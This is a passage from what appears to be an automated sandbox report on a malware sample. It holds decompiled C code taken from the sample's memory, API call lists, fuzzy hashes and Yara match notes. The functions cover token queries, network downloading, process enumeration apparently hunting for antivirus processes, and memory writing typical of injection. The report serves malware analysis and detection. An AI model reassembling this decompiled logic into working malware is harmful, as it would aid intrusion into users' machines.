				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E036D6D63(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E036D6C2C(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x036d432e
                                                          0x036d432f
                                                          0x036d4330
                                                          0x036d4331
                                                          0x036d4332
                                                          0x036d4336
                                                          0x036d433d
                                                          0x036d434c
                                                          0x036d434f
                                                          0x036d4352
                                                          0x036d4359
                                                          0x036d435c
                                                          0x036d435f
                                                          0x036d4362
                                                          0x036d4365
                                                          0x036d4370
                                                          0x036d4372
                                                          0x036d437b
                                                          0x036d4383
                                                          0x036d4385
                                                          0x036d4397
                                                          0x036d43a1
                                                          0x036d43a5
                                                          0x036d43b4
                                                          0x036d43b8
                                                          0x036d43c1
                                                          0x036d43c9
                                                          0x036d43c9
                                                          0x036d43cb
                                                          0x036d43cb
                                                          0x036d43d3
                                                          0x036d43d9
                                                          0x036d43dd
                                                          0x036d43dd
                                                          0x036d43e8

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 036D4368
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 036D437B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 036D4397
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 036D43B4
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 036D43C1
                                                          • NtClose.NTDLL(?), ref: 036D43D3
                                                          • NtClose.NTDLL(00000000), ref: 036D43DD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: c7da4e0e574f2c834213e9a6bcd41c53372be40fcc4a60cef712047eb1b0307b
                                                          • Instruction ID: 4dfea6284488a1e65a8e57cbcd81993d70214dd847e14226e1f48e0c8e1e3cdb
                                                          • Opcode Fuzzy Hash: c7da4e0e574f2c834213e9a6bcd41c53372be40fcc4a60cef712047eb1b0307b
                                                          • Instruction Fuzzy Hash: EB21FAB5D00218BBDF01EF95EC85ADEBFBDEF08740F10802AF905E6114D7B19A559BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627C431 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0627C478
                                                          • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0627C48B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0627C4A7
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0627C4C4
                                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 0627C4D1
                                                          • NtClose.NTDLL(?), ref: 0627C4E3
                                                          • NtClose.NTDLL(?), ref: 0627C4ED
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 3c12722c464614b93e2160fbf4a1ae3a427add7b81d82a0457b57bcbd71e68a4
                                                          • Instruction ID: aed0133921d627fdcc85e7e847b0ed5562d7327c98011a0cc4f67000a8e16286
                                                          • Opcode Fuzzy Hash: 3c12722c464614b93e2160fbf4a1ae3a427add7b81d82a0457b57bcbd71e68a4
                                                          • Instruction Fuzzy Hash: B021F4B2A10218AFDB41AFA5DC48EDEBFBDEF48B40F104022FA05B6150D7718A40DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06286DE0 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.NTDLL(?,?,?,0627C71A,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06286F59
                                                            • Part of subcall function 0627C4FB: GetModuleHandleA.KERNEL32(?,?,?,06287017,?,?,?,00000000), ref: 0627C539
                                                            • Part of subcall function 0627C4FB: memcpy.NTDLL(?,0629A30C,00000018,?,?,?), ref: 0627C5B5
                                                          • memcpy.NTDLL(?,?,00000018,0627C71A,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06286FA7
                                                          • memcpy.NTDLL(?,0628DD8F,00000800,?,?,?,00000000), ref: 0628702A
                                                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 06287068
                                                          • NtClose.NTDLL(00000000,?,00000000), ref: 0628708F
                                                            • Part of subcall function 06288F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0627C71A,0627C71A,?,06286EFA,?,0627C71A,?,?,00000000), ref: 06288F87
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FA9
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FBF
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FD5
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06288FEB
                                                            • Part of subcall function 06288F62: GetProcAddress.KERNEL32(00000000,?), ref: 06289001
                                                            • Part of subcall function 0628BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                            • Part of subcall function 06281CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,0627C71A,?,?,00000000), ref: 06281D58
                                                            • Part of subcall function 06281CE4: memcpy.NTDLL(?,?,?), ref: 06281DBF
                                                          • memset.NTDLL ref: 062870AA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                                                          • String ID:
                                                          • API String ID: 3674896251-0
                                                          • Opcode ID: a6470d6000f3ce3a1823bedc2e9a5f2273db41fe409bb3ed3115d5093886461a
                                                          • Instruction ID: 4a55aeaac2151b9cf55d631daa123abfb7445355c09a6fcd047cffd566cf82ef
                                                          • Opcode Fuzzy Hash: a6470d6000f3ce3a1823bedc2e9a5f2273db41fe409bb3ed3115d5093886461a
                                                          • Instruction Fuzzy Hash: DBA14B71D1120AEFDB91EFA8CC84BAEBBB4BF04304F144569ED11A7290E771EA54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D1CA5 Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E036D1CA5(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x36da174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E036D6D63(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E036D6E40( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E036D6C2C(_v16);
										if(_t64 == 0) {
											_t47 = E036D15CC(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E036D6E40( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E036D4A85(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                                          0x036d1ca5
                                                          0x036d1ca6
                                                          0x036d1cac
                                                          0x036d1cb7
                                                          0x036d1cb7
                                                          0x036d1cb9
                                                          0x036d7395
                                                          0x036d739a
                                                          0x036d739c
                                                          0x036d73b3
                                                          0x036d73e4
                                                          0x036d73e9
                                                          0x036d74ac
                                                          0x036d73ef
                                                          0x036d73f6
                                                          0x036d73fe
                                                          0x036d74a9
                                                          0x036d7404
                                                          0x036d7409
                                                          0x036d740e
                                                          0x036d7413
                                                          0x036d749b
                                                          0x036d7419
                                                          0x036d7419
                                                          0x036d741b
                                                          0x036d7421
                                                          0x036d7422
                                                          0x036d7422
                                                          0x036d7425
                                                          0x036d7428
                                                          0x036d742e
                                                          0x036d743f
                                                          0x036d7447
                                                          0x00000000
                                                          0x00000000
                                                          0x036d744f
                                                          0x036d7457
                                                          0x036d7463
                                                          0x036d7467
                                                          0x036d7469
                                                          0x036d746e
                                                          0x00000000
                                                          0x00000000
                                                          0x036d746e
                                                          0x036d7467
                                                          0x036d7480
                                                          0x036d7483
                                                          0x036d748a
                                                          0x036d7490
                                                          0x036d7495
                                                          0x036d7495
                                                          0x00000000
                                                          0x036d7470
                                                          0x036d7470
                                                          0x036d7475
                                                          0x036d7477
                                                          0x036d7478
                                                          0x036d747b
                                                          0x00000000
                                                          0x036d747b
                                                          0x00000000
                                                          0x036d7475
                                                          0x036d7422
                                                          0x036d749c
                                                          0x036d749c
                                                          0x036d74a2
                                                          0x036d74a2
                                                          0x036d73fe
                                                          0x036d73b5
                                                          0x036d73bb
                                                          0x036d73c3
                                                          0x036d73dc
                                                          0x036d73de
                                                          0x00000000
                                                          0x00000000
                                                          0x036d73c5
                                                          0x036d73cf
                                                          0x036d73d3
                                                          0x036d73d9
                                                          0x00000000
                                                          0x036d73d9
                                                          0x036d73d3
                                                          0x036d73c3
                                                          0x036d74b5
                                                          0x036d1cae
                                                          0x036d1cae
                                                          0x036d1cb5
                                                          0x036d1cc0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d1cb5

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 036D739C
                                                          • InternetReadFile.WININET(?,?,00000004,?), ref: 036D73AB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D73B5
                                                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D742E
                                                          • InternetReadFile.WININET(?,?,00001000,?), ref: 036D743F
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?,?), ref: 036D7449
                                                            • Part of subcall function 036D4A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 036D4A9C
                                                            • Part of subcall function 036D4A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D4AAC
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 036D4ADE
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B03
                                                            • Part of subcall function 036D4A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 2393427839-0
                                                          • Opcode ID: aa2c4adea21e9a316bce7a5595e691eefcf3cc56ed2e1b1d1369f6cb4775c2c0
                                                          • Instruction ID: e70f57c5d37923a2f3df55f0eed01028ef821e6aed31f9025928f4305f32f860
                                                          • Opcode Fuzzy Hash: aa2c4adea21e9a316bce7a5595e691eefcf3cc56ed2e1b1d1369f6cb4775c2c0
                                                          • Instruction Fuzzy Hash: 7C41F832E00304AFCB22EFA4DD44F6EBBBDAF84364F194569E585D7254D770E9018B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06282331 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0628235C
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 06282369
                                                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 062823F5
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 06282400
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 06282409
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 0628241E
                                                            • Part of subcall function 06280818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,06282397,?), ref: 06280820
                                                            • Part of subcall function 06280818: GetVersion.KERNEL32 ref: 0628082F
                                                            • Part of subcall function 06280818: GetCurrentProcessId.KERNEL32 ref: 0628084B
                                                            • Part of subcall function 06280818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 06280868
                                                            • Part of subcall function 0627C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0627C815
                                                            • Part of subcall function 0627A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,06277D5E), ref: 0627A6BE
                                                            • Part of subcall function 0628212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0627111D,00000000), ref: 0628214D
                                                            • Part of subcall function 0628212C: GetProcAddress.KERNEL32(00000000,?), ref: 06282166
                                                            • Part of subcall function 0628212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0627111D,00000000), ref: 06282183
                                                            • Part of subcall function 0628212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0627111D,00000000), ref: 06282194
                                                            • Part of subcall function 0628212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0627111D,00000000), ref: 062821A7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                                                          • String ID:
                                                          • API String ID: 2581485877-0
                                                          • Opcode ID: b3ceba7095d807c6555e281d8749d37c29bb608dcf62b4b26bdc22a952b02f7f
                                                          • Instruction ID: c43c810bec7bc6c6683b79c885ee7dd84ee4c488f8e50d2f0313242334ed5982
                                                          • Opcode Fuzzy Hash: b3ceba7095d807c6555e281d8749d37c29bb608dcf62b4b26bdc22a952b02f7f
                                                          • Instruction Fuzzy Hash: 9F31A271A22214EFCB52EF74EC88EAD77A9FB85754B104125FA16E7180D6349E44CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D68BD Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E036D68BD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x36da348; // 0x228d5a8
						_t2 = _t9 + 0x36dbeb0; // 0x73617661
						_push( &_v264);
						if( *0x36da12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                                                          0x036d68c8
                                                          0x036d68cd
                                                          0x036d68d2
                                                          0x036d68d6
                                                          0x036d68e0
                                                          0x036d6911
                                                          0x036d68e7
                                                          0x036d68ec
                                                          0x036d68f9
                                                          0x036d6902
                                                          0x036d6919
                                                          0x036d6904
                                                          0x036d690c
                                                          0x00000000
                                                          0x036d690c
                                                          0x036d691a
                                                          0x036d691b
                                                          0x00000000
                                                          0x036d691b
                                                          0x00000000
                                                          0x036d6915
                                                          0x036d6921
                                                          0x036d6926

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 036D68CD
                                                          • Process32First.KERNEL32(00000000,?), ref: 036D68E0
                                                          • Process32Next.KERNEL32(00000000,?), ref: 036D690C
                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 036D691B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3243318325-0
                                                          • Opcode ID: c7f3b7fe4c28cc00bfc2376ba7059bbeda233e10586a2ab2478f35fea435e470
                                                          • Instruction ID: e25702ba0aefa2a5af7f27b1ef2b2379dc8632486415615afc272fc1800a8f6e
                                                          • Opcode Fuzzy Hash: c7f3b7fe4c28cc00bfc2376ba7059bbeda233e10586a2ab2478f35fea435e470
                                                          • Instruction Fuzzy Hash: D4F02476D012256BC730F672DC08EEBB7ACDBC9310F4000A5EA06CB104EB34DA5A86A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627710A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 06277167
                                                            • Part of subcall function 0628BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,0627717E,00000000,00000000,0627717E,?,00000002,00000000,?,0627C71A,00000000,0627717E,000000FF,?), ref: 0628BEAE
                                                          • memset.NTDLL ref: 0627718B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Section$CreateViewmemset
                                                          • String ID: @
                                                          • API String ID: 2533685722-2766056989
                                                          • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                                          • Instruction ID: a46d19ac533c28dd689895722da385433de8c2f0df1362f477024004e177fa30
                                                          • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                                                          • Instruction Fuzzy Hash: 49211AB6D10209AFDB11DFA9C8849EEFBF9EF48354F104569E615F3250D730AA448FA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062861AE Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,00000318), ref: 062861D3
                                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 062861EF
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                            • Part of subcall function 0628A806: GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                            • Part of subcall function 0628A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 06286359
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                          • String ID:
                                                          • API String ID: 3547194813-0
                                                          • Opcode ID: 4ed3e25dc225cead6af17355dd7bc62d8f500f71e84df368c56f7245ae3e6866
                                                          • Instruction ID: 187a0e65e72cad5bb6635c167ca4d559d0d0687ca82914930fa40aa326e047fb
                                                          • Opcode Fuzzy Hash: 4ed3e25dc225cead6af17355dd7bc62d8f500f71e84df368c56f7245ae3e6866
                                                          • Instruction Fuzzy Hash: 6F612D71A1160AAFDB55EF94CC80BEEB7B5FF08700F004169ED14A7281DB70E954CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06280782 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 06280796
                                                          • GetProcAddress.KERNEL32(?), ref: 062807BE
                                                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 062807DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressInformationProcProcess64QueryWow64memset
                                                          • String ID:
                                                          • API String ID: 2968673968-0
                                                          • Opcode ID: 8a0acc9b8c73b36dbc4c0ce750e6690c95037cd8a38f417f63007a2fa526f64f
                                                          • Instruction ID: 3ef459117ec59c8c70428f252f0205a7a9f88ed5e99bec6586be7b07831f0493
                                                          • Opcode Fuzzy Hash: 8a0acc9b8c73b36dbc4c0ce750e6690c95037cd8a38f417f63007a2fa526f64f
                                                          • Instruction Fuzzy Hash: B8113375A11319AFEB50EB54DC49F9977A9EB85740F054025ED04EB280D770ED09CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06287950 Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(0628EB0F,00000000,00000000,0628EB0F,00003000,00000040), ref: 06287981
                                                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 06287988
                                                          • SetLastError.KERNEL32(00000000), ref: 0628798F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$AllocateLastMemoryStatusVirtual
                                                          • String ID:
                                                          • API String ID: 722216270-0
                                                          • Opcode ID: 7ba0cf3d1c1221cee4a5db0211cb8ae6b817cfd21729926b3cb98a6f62708aec
                                                          • Instruction ID: ca686000d9d333566ef1fef90ec9f41f53ad7752b29c6840f6e3589dca0de2a4
                                                          • Opcode Fuzzy Hash: 7ba0cf3d1c1221cee4a5db0211cb8ae6b817cfd21729926b3cb98a6f62708aec
                                                          • Instruction Fuzzy Hash: 69F0FEB1A21309FFEB05DB95DD09B9E77BCAB54356F104048A604A6080DBB4AB04DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285312 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0628907F,?,00000004,00000000,00000004,?), ref: 06285330
                                                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0628533F
                                                          • SetLastError.KERNEL32(00000000,?,0628907F,?,00000004,00000000,00000004,?,?,?,?,0627C691,?,00000000,CCCCFEEB,?), ref: 06285346
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Error$LastMemoryStatusVirtualWrite
                                                          • String ID:
                                                          • API String ID: 1089604434-0
                                                          • Opcode ID: b801e53b8f2e7a731a716520b6d03f0f6db782eb9993bc75087668b3106dd515
                                                          • Instruction ID: fd84c2d941ea37155f1132c99723c41cb5dc5af6a7f8de6b72c3b4aa72c655d9
                                                          • Opcode Fuzzy Hash: b801e53b8f2e7a731a716520b6d03f0f6db782eb9993bc75087668b3106dd515
                                                          • Instruction Fuzzy Hash: 5DE01A3261121AAFCF426EE8AC08DDE7B6AAB88651B048010BF01E2120C671C860EFF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D190C Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E036D190C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
